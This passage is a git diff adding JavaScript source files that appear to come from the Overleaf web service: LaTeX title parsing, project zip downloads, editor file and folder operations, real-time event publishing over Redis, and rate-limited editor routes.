index 0000000..959cc91 --- /dev/null +++ b/services/web/app/src/Features/Documents/DocumentHelper.js @@ -0,0 +1,78 @@ +/* eslint-disable + max-len, + no-cond-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let DocumentHelper +module.exports = DocumentHelper = { + getTitleFromTexContent(content, maxContentToScan) { + if (maxContentToScan == null) { + maxContentToScan = 30000 + } + const TITLE_WITH_CURLY_BRACES = /\\[tT]itle\*?\s*{([^}]+)}/ + const TITLE_WITH_SQUARE_BRACES = /\\[tT]itle\s*\[([^\]]+)\]/ + for (const line of Array.from( + DocumentHelper._getLinesFromContent(content, maxContentToScan) + )) { + let match + if ( + (match = + line.match(TITLE_WITH_CURLY_BRACES) || + line.match(TITLE_WITH_SQUARE_BRACES)) + ) { + return DocumentHelper.detex(match[1]) + } + } + + return null + }, + + contentHasDocumentclass(content, maxContentToScan) { + if (maxContentToScan == null) { + maxContentToScan = 30000 + } + for (const line of Array.from( + DocumentHelper._getLinesFromContent(content, maxContentToScan) + )) { + // We've had problems with this regex locking up CPU. + // Previously /.*\\documentclass/ would totally lock up on lines of 500kb (data text files :() + // This regex will only look from the start of the line, including whitespace so will return quickly + // regardless of line length. 
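+      // Roughly: an unanchored /.*\\documentclass/ can be retried from
+      // every offset of a long line (quadratic on 500kb data lines),
+      // while the anchored check gives up right after leading whitespace.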
+ if (line.match(/^\s*\\documentclass/)) { + return true + } + } + + return false + }, + + detex(string) { + return string + .replace(/\\LaTeX/g, 'LaTeX') + .replace(/\\TeX/g, 'TeX') + .replace(/\\TikZ/g, 'TikZ') + .replace(/\\BibTeX/g, 'BibTeX') + .replace(/\\\[[A-Za-z0-9. ]*\]/g, ' ') // line spacing + .replace(/\\(?:[a-zA-Z]+|.|)/g, '') + .replace(/{}|~/g, ' ') + .replace(/[${}]/g, '') + .replace(/ +/g, ' ') + .trim() + }, + + _getLinesFromContent(content, maxContentToScan) { + if (typeof content === 'string') { + return content.substring(0, maxContentToScan).split('\n') + } else { + return content + } + }, +} diff --git a/services/web/app/src/Features/Downloads/ProjectDownloadsController.mjs b/services/web/app/src/Features/Downloads/ProjectDownloadsController.mjs new file mode 100644 index 0000000..6bd239b --- /dev/null +++ b/services/web/app/src/Features/Downloads/ProjectDownloadsController.mjs @@ -0,0 +1,79 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import Metrics from '@overleaf/metrics' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectZipStreamManager from './ProjectZipStreamManager.mjs' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import { prepareZipAttachment } from '../../infrastructure/Response.js' + +let ProjectDownloadsController + +export default ProjectDownloadsController = { + downloadProject(req, res, next) { + const projectId = req.params.Project_id + Metrics.inc('zip-downloads') + return DocumentUpdaterHandler.flushProjectToMongo( + projectId, + function (error) { + if (error != null) { + return next(error) + } + return ProjectGetter.getProject( + projectId, + { name: true }, + function (error, project) { + if (error != null) { + return next(error) + } + return ProjectZipStreamManager.createZipStreamForProject( + projectId, + function (error, stream) { + if (error != null) { + return next(error) + } + prepareZipAttachment(res, `${project.name}.zip`) + return stream.pipe(res) + } + ) + } + ) + } + ) + }, + + downloadMultipleProjects(req, res, next) { + const projectIds = req.query.project_ids.split(',') + Metrics.inc('zip-downloads-multiple') + return DocumentUpdaterHandler.flushMultipleProjectsToMongo( + projectIds, + function (error) { + if (error != null) { + return next(error) + } + return ProjectZipStreamManager.createZipStreamForMultipleProjects( + projectIds, + function (error, stream) { + if (error != null) { + return next(error) + } + prepareZipAttachment( + res, + `Overleaf Projects (${projectIds.length} items).zip` + ) + return stream.pipe(res) + } + ) + } + ) + }, +} diff --git a/services/web/app/src/Features/Downloads/ProjectZipStreamManager.mjs b/services/web/app/src/Features/Downloads/ProjectZipStreamManager.mjs new file mode 100644 index 0000000..2c07251 --- /dev/null +++ b/services/web/app/src/Features/Downloads/ProjectZipStreamManager.mjs @@ -0,0 +1,160 @@ +import archiver from 'archiver' +import async from 'async' +import logger from '@overleaf/logger' +import ProjectEntityHandler from '../Project/ProjectEntityHandler.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import HistoryManager from 
'../History/HistoryManager.js' +import FileStoreHandler from '../FileStore/FileStoreHandler.js' +import Features from '../../infrastructure/Features.js' +let ProjectZipStreamManager + +export default ProjectZipStreamManager = { + createZipStreamForMultipleProjects(projectIds, callback) { + // We'll build up a zip file that contains multiple zip files + const archive = archiver('zip') + archive.on('error', err => + logger.err( + { err, projectIds }, + 'something went wrong building archive of project' + ) + ) + callback(null, archive) + + const jobs = projectIds.map(projectId => cb => { + ProjectGetter.getProject(projectId, { name: true }, (error, project) => { + if (error) { + return cb(error) + } + if (!project) { + logger.debug( + { projectId }, + 'cannot append project to zip stream: project not found' + ) + return cb() + } + logger.debug( + { projectId, name: project.name }, + 'appending project to zip stream' + ) + ProjectZipStreamManager.createZipStreamForProject( + projectId, + (error, stream) => { + if (error) { + return cb(error) + } + archive.append(stream, { name: `${project.name}.zip` }) + stream.on('end', () => { + logger.debug( + { projectId, name: project.name }, + 'zip stream ended' + ) + cb() + }) + } + ) + }) + }) + + async.series(jobs, () => { + logger.debug( + { projectIds }, + 'finished creating zip stream of multiple projects' + ) + archive.finalize() + }) + }, + + createZipStreamForProject(projectId, callback) { + const archive = archiver('zip') + // return stream immediately before we start adding things to it + archive.on('error', err => + logger.err( + { err, projectId }, + 'something went wrong building archive of project' + ) + ) + callback(null, archive) + this.addAllDocsToArchive(projectId, archive, error => { + if (error) { + logger.error( + { err: error, projectId }, + 'error adding docs to zip stream' + ) + } + this.addAllFilesToArchive(projectId, archive, error => { + if (error) { + logger.error( + { err: error, projectId }, + 'error adding files to zip stream' + ) + } + archive.finalize() + }) + }) + }, + + addAllDocsToArchive(projectId, archive, callback) { + ProjectEntityHandler.getAllDocs(projectId, (error, docs) => { + if (error) { + return callback(error) + } + const jobs = Object.entries(docs).map(([path, doc]) => cb => { + if (path[0] === '/') { + path = path.slice(1) + } + logger.debug({ projectId }, 'Adding doc') + archive.append(doc.lines.join('\n'), { name: path }) + setImmediate(cb) + }) + async.series(jobs, callback) + }) + }, + + getFileStream: (projectId, file, callback) => { + if (Features.hasFeature('project-history-blobs')) { + HistoryManager.requestBlobWithFallback( + projectId, + file.hash, + file._id, + (error, result) => { + if (error) { + return callback(error) + } + const { stream } = result + callback(null, stream) + } + ) + } else { + FileStoreHandler.getFileStream(projectId, file._id, {}, callback) + } + }, + + addAllFilesToArchive(projectId, archive, callback) { + ProjectEntityHandler.getAllFiles(projectId, (error, files) => { + if (error) { + return callback(error) + } + const jobs = Object.entries(files).map(([path, file]) => cb => { + ProjectZipStreamManager.getFileStream( + projectId, + file, + (error, stream) => { + if (error) { + logger.warn( + { err: error, projectId, fileId: file._id }, + 'something went wrong adding file to zip archive' + ) + return cb(error) + } + if (path[0] === '/') { + path = path.slice(1) + } + archive.append(stream, { name: path }) + stream.on('end', () => cb()) + } + ) + }) + 
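+      // Cap concurrency at five so a project with many files doesn't
+      // open hundreds of file streams into the archive at once.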
async.parallelLimit(jobs, 5, callback) + }) + }, +} diff --git a/services/web/app/src/Features/Editor/EditorController.js b/services/web/app/src/Features/Editor/EditorController.js new file mode 100644 index 0000000..4d3a5e9 --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorController.js @@ -0,0 +1,695 @@ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const ProjectEntityUpdateHandler = require('../Project/ProjectEntityUpdateHandler') +const ProjectOptionsHandler = require('../Project/ProjectOptionsHandler') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectDeleter = require('../Project/ProjectDeleter') +const EditorRealTimeController = require('./EditorRealTimeController') +const async = require('async') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const { promisifyAll } = require('@overleaf/promise-utils') + +const EditorController = { + addDoc(projectId, folderId, docName, docLines, source, userId, callback) { + EditorController.addDocWithRanges( + projectId, + folderId, + docName, + docLines, + {}, + source, + userId, + callback + ) + }, + + addDocWithRanges( + projectId, + folderId, + docName, + docLines, + docRanges, + source, + userId, + callback + ) { + docName = docName.trim() + Metrics.inc('editor.add-doc') + ProjectEntityUpdateHandler.addDocWithRanges( + projectId, + folderId, + docName, + docLines, + docRanges, + userId, + source, + (err, doc, folderId) => { + if (err) { + OError.tag(err, 'error adding doc without lock', { + projectId, + docName, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewDoc', + folderId, + doc, + source, + userId + ) + callback(err, doc) + } + ) + }, + + addFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + source, + userId, + callback + ) { + fileName = fileName.trim() + Metrics.inc('editor.add-file') + ProjectEntityUpdateHandler.addFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source, + (err, fileRef, folderId) => { + if (err) { + OError.tag(err, 'error adding file without lock', { + projectId, + folderId, + fileName, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + folderId, + fileRef, + source, + linkedFileData, + userId + ) + callback(err, fileRef) + } + ) + }, + + appendToDoc(projectId, docId, docLines, source, userId, callback) { + ProjectEntityUpdateHandler.appendToDoc( + projectId, + docId, + docLines, + source, + userId, + function (err, doc) { + if (err) { + OError.tag(err, 'error appending to doc', { + projectId, + docId, + }) + return callback(err) + } + callback(err, doc) + } + ) + }, + + upsertDoc(projectId, folderId, docName, docLines, source, userId, callback) { + ProjectEntityUpdateHandler.upsertDoc( + projectId, + folderId, + docName, + docLines, + source, + userId, + function (err, doc, didAddNewDoc) { + if (didAddNewDoc) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewDoc', + folderId, + doc, + source, + userId + ) + } + callback(err, doc) + } + ) + }, + + upsertFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + source, + userId, + callback + ) { + ProjectEntityUpdateHandler.upsertFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source, + function (err, newFile, didAddFile, existingFile) { + if (err) { + return callback(err) + } + if 
(!didAddFile) { + // replacement, so remove the existing file from the client + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingFile._id, + source + ) + } + // now add the new file on the client + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + folderId, + newFile, + source, + linkedFileData, + userId + ) + callback(null, newFile) + } + ) + }, + + upsertDocWithPath( + projectId, + elementPath, + docLines, + source, + userId, + callback + ) { + ProjectEntityUpdateHandler.upsertDocWithPath( + projectId, + elementPath, + docLines, + source, + userId, + function (err, doc, didAddNewDoc, newFolders, lastFolder) { + if (err) { + return callback(err) + } + EditorController._notifyProjectUsersOfNewFolders( + projectId, + newFolders, + function (err) { + if (err) { + return callback(err) + } + if (didAddNewDoc) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewDoc', + lastFolder._id, + doc, + source, + userId + ) + } + callback(null, { doc, folder: lastFolder }) + } + ) + } + ) + }, + + upsertFileWithPath( + projectId, + elementPath, + fsPath, + linkedFileData, + source, + userId, + callback + ) { + ProjectEntityUpdateHandler.upsertFileWithPath( + projectId, + elementPath, + fsPath, + linkedFileData, + userId, + source, + function ( + err, + newFile, + didAddFile, + existingFile, + newFolders, + lastFolder + ) { + if (err) { + return callback(err) + } + EditorController._notifyProjectUsersOfNewFolders( + projectId, + newFolders, + function (err) { + if (err) { + return callback(err) + } + if (!didAddFile) { + // replacement, so remove the existing file from the client + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingFile._id, + source + ) + } + // now add the new file on the client + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + lastFolder._id, + newFile, + source, + linkedFileData, + userId + ) + callback(null, { file: newFile, folder: lastFolder }) + } + ) + } + ) + }, + + addFolder(projectId, folderId, folderName, source, userId, callback) { + folderName = folderName.trim() + Metrics.inc('editor.add-folder') + ProjectEntityUpdateHandler.addFolder( + projectId, + folderId, + folderName, + userId, + (err, folder, folderId) => { + if (err) { + OError.tag(err, 'could not add folder', { + projectId, + folderId, + folderName, + source, + }) + return callback(err) + } + EditorController._notifyProjectUsersOfNewFolder( + projectId, + folderId, + folder, + userId, + function (err) { + if (err) { + return callback(err) + } + callback(null, folder) + } + ) + } + ) + }, + + mkdirp(projectId, path, userId, callback) { + logger.debug({ projectId, path }, "making directories if they don't exist") + ProjectEntityUpdateHandler.mkdirp( + projectId, + path, + userId, + (err, newFolders, lastFolder) => { + if (err) { + OError.tag(err, 'could not mkdirp', { + projectId, + path, + }) + return callback(err) + } + + EditorController._notifyProjectUsersOfNewFolders( + projectId, + newFolders, + function (err) { + if (err) { + return callback(err) + } + callback(null, newFolders, lastFolder) + } + ) + } + ) + }, + + deleteEntity(projectId, entityId, entityType, source, userId, callback) { + Metrics.inc('editor.delete-entity') + ProjectEntityUpdateHandler.deleteEntity( + projectId, + entityId, + entityType, + userId, + source, + function (err) { + if (err) { + OError.tag(err, 'could not delete entity', { + projectId, + entityId, + entityType, + }) + return callback(err) + } + logger.debug( + { 
projectId, entityId, entityType }, + 'telling users entity has been deleted' + ) + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + entityId, + source + ) + callback() + } + ) + }, + + deleteEntityWithPath(projectId, path, source, userId, callback) { + ProjectEntityUpdateHandler.deleteEntityWithPath( + projectId, + path, + userId, + source, + function (err, entityId) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + entityId, + source + ) + callback(null, entityId) + } + ) + }, + + updateProjectDescription(projectId, description, callback) { + logger.debug({ projectId, description }, 'updating project description') + ProjectDetailsHandler.setProjectDescription( + projectId, + description, + function (err) { + if (err) { + OError.tag( + err, + 'something went wrong setting the project description', + { + projectId, + description, + } + ) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'projectDescriptionUpdated', + description + ) + callback() + } + ) + }, + + deleteProject(projectId, callback) { + Metrics.inc('editor.delete-project') + ProjectDeleter.deleteProject(projectId, callback) + }, + + renameEntity( + projectId, + entityId, + entityType, + newName, + userId, + source, + callback + ) { + Metrics.inc('editor.rename-entity') + ProjectEntityUpdateHandler.renameEntity( + projectId, + entityId, + entityType, + newName, + userId, + source, + function (err) { + if (err) { + OError.tag(err, 'error renaming entity', { + projectId, + entityId, + entityType, + newName, + }) + return callback(err) + } + if (newName.length > 0) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveEntityRename', + entityId, + newName + ) + } + callback() + } + ) + }, + + moveEntity( + projectId, + entityId, + folderId, + entityType, + userId, + source, + callback + ) { + Metrics.inc('editor.move-entity') + ProjectEntityUpdateHandler.moveEntity( + projectId, + entityId, + folderId, + entityType, + userId, + source, + function (err) { + if (err) { + OError.tag(err, 'error moving entity', { + projectId, + entityId, + folderId, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'reciveEntityMove', + entityId, + folderId + ) + callback() + } + ) + }, + + renameProject(projectId, newName, callback) { + ProjectDetailsHandler.renameProject(projectId, newName, function (err) { + if (err) { + OError.tag(err, 'error renaming project', { + projectId, + newName, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'projectNameUpdated', + newName + ) + callback() + }) + }, + + setCompiler(projectId, compiler, callback) { + ProjectOptionsHandler.setCompiler(projectId, compiler, function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'compilerUpdated', + compiler + ) + callback() + }) + }, + + setImageName(projectId, imageName, callback) { + ProjectOptionsHandler.setImageName(projectId, imageName, function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'imageNameUpdated', + imageName + ) + callback() + }) + }, + + setSpellCheckLanguage(projectId, languageCode, callback) { + ProjectOptionsHandler.setSpellCheckLanguage( + projectId, + languageCode, + function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'spellCheckLanguageUpdated', + languageCode + ) + callback() + } + ) + 
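+    // NB: several event names in this controller ('reciveNewDoc',
+    // 'reciveNewFile', 'reciveEntityRename', ...) are long-standing
+    // misspellings baked into the wire protocol shared with real-time
+    // clients, so they cannot be corrected on the server alone.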
}, + + setPublicAccessLevel(projectId, newAccessLevel, callback) { + async.series( + [ + cb => { + if (newAccessLevel === PublicAccessLevels.TOKEN_BASED) { + ProjectDetailsHandler.ensureTokensArePresent(projectId, cb) + } else { + cb() + } + }, + cb => + ProjectDetailsHandler.setPublicAccessLevel( + projectId, + newAccessLevel, + cb + ), + cb => { + EditorRealTimeController.emitToRoom( + projectId, + 'project:publicAccessLevel:changed', + { newAccessLevel } + ) + cb() + }, + ], + callback + ) + }, + + setRootDoc(projectId, newRootDocID, callback) { + ProjectEntityUpdateHandler.setRootDoc( + projectId, + newRootDocID, + function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'rootDocUpdated', + newRootDocID + ) + callback() + } + ) + }, + + setMainBibliographyDoc(projectId, newBibliographyDocId, callback) { + ProjectEntityUpdateHandler.setMainBibliographyDoc( + projectId, + newBibliographyDocId, + function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'mainBibliographyDocUpdated', + newBibliographyDocId + ) + callback() + } + ) + }, + + _notifyProjectUsersOfNewFolders(projectId, folders, callback) { + async.eachSeries( + folders, + (folder, cb) => + EditorController._notifyProjectUsersOfNewFolder( + projectId, + folder.parentFolder_id, + folder, + null, + cb + ), + callback + ) + }, + + _notifyProjectUsersOfNewFolder( + projectId, + folderId, + folder, + userId, + callback + ) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFolder', + folderId, + folder, + userId + ) + callback() + }, +} + +EditorController.promises = promisifyAll(EditorController, { + multiResult: { + mkdirp: ['newFolders', 'lastFolder'], + }, +}) +module.exports = EditorController diff --git a/services/web/app/src/Features/Editor/EditorHttpController.js b/services/web/app/src/Features/Editor/EditorHttpController.js new file mode 100644 index 0000000..45c9b24 --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorHttpController.js @@ -0,0 +1,294 @@ +const ProjectDeleter = require('../Project/ProjectDeleter') +const EditorController = require('./EditorController') +const ProjectGetter = require('../Project/ProjectGetter') +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const ProjectEditorHandler = require('../Project/ProjectEditorHandler') +const Metrics = require('@overleaf/metrics') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const CollaboratorsInviteGetter = require('../Collaborators/CollaboratorsInviteGetter') +const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const SessionManager = require('../Authentication/SessionManager') +const Errors = require('../Errors/Errors') +const DocstoreManager = require('../Docstore/DocstoreManager') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') + +module.exports = { + joinProject: expressify(joinProject), + addDoc: expressify(addDoc), + addFolder: expressify(addFolder), + renameEntity: expressify(renameEntity), + moveEntity: expressify(moveEntity), + deleteDoc: expressify(deleteDoc), + deleteFile: expressify(deleteFile), + deleteFolder: expressify(deleteFolder), + deleteEntity: expressify(deleteEntity), + _nameIsAcceptableLength, +} + +async function joinProject(req, res, next) { + const 
projectId = req.params.Project_id + let userId = req.body.userId // keep schema in sync with router + if (userId === 'anonymous-user') { + userId = null + } + Metrics.inc('editor.join-project') + const { + project, + privilegeLevel, + isRestrictedUser, + isTokenMember, + isInvitedMember, + } = await _buildJoinProjectView(req, projectId, userId) + if (!project) { + return res.sendStatus(403) + } + // Hide sensitive data if the user is restricted + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } + project.members = [] + project.invites = [] + } + // Only show the 'renamed or deleted' message once + if (project.deletedByExternalDataSource) { + await ProjectDeleter.promises.unmarkAsDeletedByExternalSource(projectId) + } + + if (project.spellCheckLanguage) { + project.spellCheckLanguage = await chooseSpellCheckLanguage( + project.spellCheckLanguage + ) + } + + res.json({ + project, + privilegeLevel, + isRestrictedUser, + isTokenMember, + isInvitedMember, + }) +} + +async function _buildJoinProjectView(req, projectId, userId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + if (project == null) { + throw new Errors.NotFoundError('project not found') + } + let deletedDocsFromDocstore = [] + try { + deletedDocsFromDocstore = + await DocstoreManager.promises.getAllDeletedDocs(projectId) + } catch (err) { + // The query in docstore is not optimized at this time and fails for + // projects with many very large, deleted documents. + // Not serving the user with deletedDocs from docstore may cause a minor + // UI issue with deleted files that are no longer available for restore. + logger.warn( + { err, projectId }, + 'soft-failure when fetching deletedDocs from docstore' + ) + } + const members = + await CollaboratorsGetter.promises.getInvitedMembersWithPrivilegeLevels( + projectId + ) + const token = req.body.anonymousAccessToken + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, + projectId, + token + ) + if (privilegeLevel == null || privilegeLevel === PrivilegeLevels.NONE) { + return { project: null, privilegeLevel: null, isRestrictedUser: false } + } + const invites = + await CollaboratorsInviteGetter.promises.getAllInvites(projectId) + const isTokenMember = await CollaboratorsHandler.promises.userIsTokenMember( + userId, + projectId + ) + const isInvitedMember = + await CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + userId, + projectId + ) + const isRestrictedUser = AuthorizationManager.isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember + ) + return { + project: ProjectEditorHandler.buildProjectModelView( + project, + members, + invites, + deletedDocsFromDocstore + ), + privilegeLevel, + isTokenMember, + isInvitedMember, + isRestrictedUser, + } +} + +function _nameIsAcceptableLength(name) { + return name != null && name.length < 150 && name.length !== 0 +} + +async function addDoc(req, res, next) { + const projectId = req.params.Project_id + const { name } = req.body + const parentFolderId = req.body.parent_folder_id + const userId = SessionManager.getLoggedInUserId(req.session) + + if (!_nameIsAcceptableLength(name)) { + return res.sendStatus(400) + } + try { + const doc = await EditorController.promises.addDoc( + projectId, + parentFolderId, + name, + [], + 'editor', + userId + ) + res.json(doc) + } catch (err) { + if (err.message === 'project_has_too_many_files') { + res.status(400).json(req.i18n.translate('project_has_too_many_files')) + 
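+      // (the error message string doubles as the i18n key used for the
+      // 400 response body)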
} else { + next(err) + } + } +} + +async function addFolder(req, res, next) { + const projectId = req.params.Project_id + const { name } = req.body + const parentFolderId = req.body.parent_folder_id + const userId = SessionManager.getLoggedInUserId(req.session) + if (!_nameIsAcceptableLength(name)) { + return res.sendStatus(400) + } + try { + const doc = await EditorController.promises.addFolder( + projectId, + parentFolderId, + name, + 'editor', + userId + ) + res.json(doc) + } catch (err) { + if (err.message === 'project_has_too_many_files') { + res.status(400).json(req.i18n.translate('project_has_too_many_files')) + } else if (err.message === 'invalid element name') { + res.status(400).json(req.i18n.translate('invalid_file_name')) + } else { + next(err) + } + } +} + +async function renameEntity(req, res, next) { + const projectId = req.params.Project_id + const entityId = req.params.entity_id + const entityType = req.params.entity_type + const { name, source = 'editor' } = req.body + if (!_nameIsAcceptableLength(name)) { + return res.sendStatus(400) + } + const userId = SessionManager.getLoggedInUserId(req.session) + await EditorController.promises.renameEntity( + projectId, + entityId, + entityType, + name, + userId, + source + ) + res.sendStatus(204) +} + +async function moveEntity(req, res, next) { + const projectId = req.params.Project_id + const entityId = req.params.entity_id + const entityType = req.params.entity_type + const folderId = req.body.folder_id + const source = req.body.source ?? 'editor' + const userId = SessionManager.getLoggedInUserId(req.session) + await EditorController.promises.moveEntity( + projectId, + entityId, + folderId, + entityType, + userId, + source + ) + res.sendStatus(204) +} + +async function deleteDoc(req, res, next) { + req.params.entity_type = 'doc' + await deleteEntity(req, res, next) +} + +async function deleteFile(req, res, next) { + req.params.entity_type = 'file' + await deleteEntity(req, res, next) +} + +async function deleteFolder(req, res, next) { + req.params.entity_type = 'folder' + await deleteEntity(req, res, next) +} + +async function deleteEntity(req, res, next) { + const projectId = req.params.Project_id + const entityId = req.params.entity_id + const entityType = req.params.entity_type + const userId = SessionManager.getLoggedInUserId(req.session) + await EditorController.promises.deleteEntity( + projectId, + entityId, + entityType, + 'editor', + userId + ) + res.sendStatus(204) +} + +const supportedSpellCheckLanguages = new Set( + Settings.languages + // only include spell-check languages that are available in the client + .filter(language => language.dic !== undefined) + .map(language => language.code) +) + +async function chooseSpellCheckLanguage(spellCheckLanguage) { + if (supportedSpellCheckLanguages.has(spellCheckLanguage)) { + return spellCheckLanguage + } + + // Preserve the value in the database so they can use it again once we add back support. + // Map some server-only languages to a specific variant, or disable spell checking for currently unsupported spell check languages. 
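+  // e.g. a project saved with spellCheckLanguage 'en' keeps 'en' in
+  // mongo but the editor is sent 'en_US'; a language with no client
+  // dictionary at all is sent '' (spell check off).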
+ switch (spellCheckLanguage) { + case 'en': + // map "English" to "English (American)" + return 'en_US' + + case 'no': + // map "Norwegian" to "Norwegian (Bokmål)" + return 'nb_NO' + + default: + // map anything else to "off" + return '' + } +} diff --git a/services/web/app/src/Features/Editor/EditorRealTimeController.js b/services/web/app/src/Features/Editor/EditorRealTimeController.js new file mode 100644 index 0000000..086870e --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorRealTimeController.js @@ -0,0 +1,50 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let EditorRealTimeController +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('pubsub') +const os = require('os') +const crypto = require('crypto') + +const HOST = os.hostname() +const RND = crypto.randomBytes(4).toString('hex') // generate a random key for this process +let COUNT = 0 + +module.exports = EditorRealTimeController = { + emitToRoom(roomId, message, ...payload) { + // create a unique message id using a counter + const messageId = `web:${HOST}:${RND}-${COUNT++}` + let channel + if (roomId === 'all' || !Settings.publishOnIndividualChannels) { + channel = 'editor-events' + } else { + channel = `editor-events:${roomId}` + } + const blob = JSON.stringify({ + room_id: roomId, + message, + payload, + _id: messageId, + }) + Metrics.summary('redis.publish.editor-events', blob.length, { + status: message, + }) + return rclient.publish(channel, blob) + }, + + emitToAll(message, ...payload) { + return this.emitToRoom('all', message, ...Array.from(payload)) + }, +} diff --git a/services/web/app/src/Features/Editor/EditorRouter.mjs b/services/web/app/src/Features/Editor/EditorRouter.mjs new file mode 100644 index 0000000..4a75c19 --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorRouter.mjs @@ -0,0 +1,86 @@ +import EditorHttpController from './EditorHttpController.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import { validate, Joi } from '../../infrastructure/Validation.js' + +const rateLimiters = { + addDocToProject: new RateLimiter('add-doc-to-project', { + points: 30, + duration: 60, + }), + addFolderToProject: new RateLimiter('add-folder-to-project', { + points: 60, + duration: 60, + }), + joinProject: new RateLimiter('join-project', { points: 45, duration: 60 }), +} + +export default { + apply(webRouter, privateApiRouter) { + webRouter.post( + '/project/:Project_id/doc', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.addDocToProject, { + params: ['Project_id'], + }), + EditorHttpController.addDoc + ) + webRouter.post( + '/project/:Project_id/folder', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.addFolderToProject, { + 
params: ['Project_id'], + }), + EditorHttpController.addFolder + ) + + webRouter.post( + '/project/:Project_id/:entity_type/:entity_id/rename', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.renameEntity + ) + webRouter.post( + '/project/:Project_id/:entity_type/:entity_id/move', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.moveEntity + ) + + webRouter.delete( + '/project/:Project_id/file/:entity_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.deleteFile + ) + webRouter.delete( + '/project/:Project_id/doc/:entity_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.deleteDoc + ) + webRouter.delete( + '/project/:Project_id/folder/:entity_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.deleteFolder + ) + + // Called by the real-time API to load up the current project state. + // This is a post request because it's more than just a getting of data. We take actions + // whenever a user joins a project, like updating the deleted status. + privateApiRouter.post( + '/project/:Project_id/join', + AuthenticationController.requirePrivateApiAuth(), + RateLimiterMiddleware.rateLimit(rateLimiters.joinProject, { + params: ['Project_id'], + // keep schema in sync with controller + getUserId: req => req.body.userId, + }), + validate({ + body: Joi.object({ + userId: Joi.string().required(), + anonymousAccessToken: Joi.string().optional(), + }), + }), + EditorHttpController.joinProject + ) + }, +} diff --git a/services/web/app/src/Features/Email/Bodies/NoCTAEmailBody.js 